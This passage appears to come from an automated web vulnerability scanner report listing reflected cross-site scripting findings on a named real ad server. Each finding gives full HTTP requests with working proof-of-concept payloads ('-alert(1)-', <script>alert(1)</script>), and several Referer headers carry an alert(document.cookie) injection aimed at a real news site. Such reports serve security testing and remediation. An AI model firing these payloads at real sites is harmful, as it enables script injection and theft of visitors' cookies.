GET /addyn%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH;target=8ddee'-alert(1)-'ae3f639f0a7 HTTP/1.1 Host: adserver.adtech.de Proxy-Connection: keep-alive Referer: http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH;target=_blank;grp=9112943 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C
Response
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 579
The value of the target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86ba5'-alert(1)-'dc232125ca4 was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /addyn%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH;target=86ba5'-alert(1)-'dc232125ca4 HTTP/1.1 Host: adserver.adtech.de Proxy-Connection: keep-alive Referer: http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH;target=_blank;grp=9112943 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C
Response
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 300
The value of the target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8360e'-alert(1)-'29e96183ae2 was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /addyn%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH;target=8360e'-alert(1)-'29e96183ae2 HTTP/1.1 Host: adserver.adtech.de Proxy-Connection: keep-alive Referer: http://adserver.adtech.de/adiframe%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH;target=_blank;grp=9112943 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C
Response
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 304
The value of the target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 862c0'-alert(1)-'79cfb584069 was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /addyn%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH;target=862c0'-alert(1)-'79cfb584069 HTTP/1.1 Host: adserver.adtech.de Proxy-Connection: keep-alive Referer: http://adserver.adtech.de/adiframe%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH;target=_blank;grp=9112943 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C
Response
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 301
2.13. http://adserver.adtech.de/addyn|2.0|277|75593|1|246|target=_blank [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://adserver.adtech.de
Path:
/addyn|2.0|277|75593|1|246|target=_blank
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77cfd'-alert(1)-'c95538b025c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /addyn|2.0|277|75593|1|246|target=_blank?77cfd'-alert(1)-'c95538b025c=1 HTTP/1.1 Host: adserver.adtech.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4D0A0D7F6E651A44E171CE41F0002F7C; CfP=1;
Response
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 276
The value of the target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13e41'-alert(1)-'fbe60fa0e4a was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /addyn|3.0|277|1028361|0|171|ADTECH;target=13e41'-alert(1)-'fbe60fa0e4a HTTP/1.1 Host: adserver.adtech.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4D0A0D7F6E651A44E171CE41F0002F7C; CfP=1;
Response
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 300
The value of the target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3ae0e'-alert(1)-'ad1f7721bb8 was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /addyn|3.0|277|1028844|0|889|ADTECH;target=3ae0e'-alert(1)-'ad1f7721bb8 HTTP/1.1 Host: adserver.adtech.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4D0A0D7F6E651A44E171CE41F0002F7C; CfP=1;
Response
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 578
The value of the target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19364'-alert(1)-'41de7d250a3 was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /addyn|3.0|277|1028878|0|154|ADTECH;target=19364'-alert(1)-'41de7d250a3 HTTP/1.1 Host: adserver.adtech.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4D0A0D7F6E651A44E171CE41F0002F7C; CfP=1;
Response
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 300
The value of the target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15140'-alert(1)-'943d8807d0d was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /addyn|3.0|277|2144686|0|2130|ADTECH;target=15140'-alert(1)-'943d8807d0d HTTP/1.1 Host: adserver.adtech.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4D0A0D7F6E651A44E171CE41F0002F7C; CfP=1;
Response
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 304
The value of the target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8e01'-alert(1)-'dd5813d7c1f was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /addyn|3.0|277|2144687|0|2130|ADTECH;target=e8e01'-alert(1)-'dd5813d7c1f HTTP/1.1 Host: adserver.adtech.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4D0A0D7F6E651A44E171CE41F0002F7C; CfP=1;
Response
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 301
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c5f3"><script>alert(1)</script>31251b41629 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe%7C3.0%7C277%7C1028361%7C0%7C171%7CADTECH5c5f3"><script>alert(1)</script>31251b41629;target=_blank;grp=9112943 HTTP/1.1 Host: adserver.adtech.de Proxy-Connection: keep-alive Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 267
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbfe9"><script>alert(1)</script>7414326b96b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe%7C3.0%7C277%7C1028361%7C0%7C171%7CADTECH;target=_blank;grp=9112943&fbfe9"><script>alert(1)</script>7414326b96b=1 HTTP/1.1 Host: adserver.adtech.de Proxy-Connection: keep-alive Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 270
The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e61e7"><script>alert(1)</script>9b5044c0fa6 was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe%7C3.0%7C277%7C1028361%7C0%7C171%7CADTECH;target=_blank;grp=9112943e61e7"><script>alert(1)</script>9b5044c0fa6 HTTP/1.1 Host: adserver.adtech.de Proxy-Connection: keep-alive Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 267
The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload e5f71><script>alert(1)</script>8b855ad043f was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe%7C3.0%7C277%7C1028361%7C0%7C171%7CADTECH;target=e5f71><script>alert(1)</script>8b855ad043f HTTP/1.1 Host: adserver.adtech.de Proxy-Connection: keep-alive Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 284
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4cfc0"><script>alert(1)</script>08069858cfb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH4cfc0"><script>alert(1)</script>08069858cfb;target=_blank;grp=9112943 HTTP/1.1 Host: adserver.adtech.de Proxy-Connection: keep-alive Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 267
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad316"><script>alert(1)</script>c5ed9f78d89 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH;target=_blank;grp=9112943&ad316"><script>alert(1)</script>c5ed9f78d89=1 HTTP/1.1 Host: adserver.adtech.de Proxy-Connection: keep-alive Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 270
The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa629"><script>alert(1)</script>ae7026f283f was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH;target=_blank;grp=9112943fa629"><script>alert(1)</script>ae7026f283f HTTP/1.1 Host: adserver.adtech.de Proxy-Connection: keep-alive Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 267
The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 7b45d><script>alert(1)</script>7f8724349bc was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH;target=7b45d><script>alert(1)</script>7f8724349bc HTTP/1.1 Host: adserver.adtech.de Proxy-Connection: keep-alive Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 284
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5927c"><script>alert(1)</script>441730d7db1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH5927c"><script>alert(1)</script>441730d7db1;target=_blank;grp=9112943 HTTP/1.1 Host: adserver.adtech.de Proxy-Connection: keep-alive Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 267
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef357"><script>alert(1)</script>0faf3202082 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH;target=_blank;grp=9112943&ef357"><script>alert(1)</script>0faf3202082=1 HTTP/1.1 Host: adserver.adtech.de Proxy-Connection: keep-alive Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 270
The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae473"><script>alert(1)</script>ccd142fd795 was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH;target=_blank;grp=9112943ae473"><script>alert(1)</script>ccd142fd795 HTTP/1.1 Host: adserver.adtech.de Proxy-Connection: keep-alive Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 267
The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 4271d><script>alert(1)</script>2a331f8adb9 was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH;target=4271d><script>alert(1)</script>2a331f8adb9 HTTP/1.1 Host: adserver.adtech.de Proxy-Connection: keep-alive Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 284
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ec59"><script>alert(1)</script>023a78beb19 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH1ec59"><script>alert(1)</script>023a78beb19;target=_blank;grp=9112943 HTTP/1.1 Host: adserver.adtech.de Proxy-Connection: keep-alive Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 268
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee892"><script>alert(1)</script>2c0638b6731 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH;target=_blank;grp=9112943&ee892"><script>alert(1)</script>2c0638b6731=1 HTTP/1.1 Host: adserver.adtech.de Proxy-Connection: keep-alive Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 271
The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 6b7bf><script>alert(1)</script>475490e67fb was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH;target=6b7bf><script>alert(1)</script>475490e67fb HTTP/1.1 Host: adserver.adtech.de Proxy-Connection: keep-alive Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 285
The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0236"><script>alert(1)</script>53375651d8e was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH;target=_blank;grp=9112943d0236"><script>alert(1)</script>53375651d8e HTTP/1.1 Host: adserver.adtech.de Proxy-Connection: keep-alive Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 268
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52025"><script>alert(1)</script>9a88a4436ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
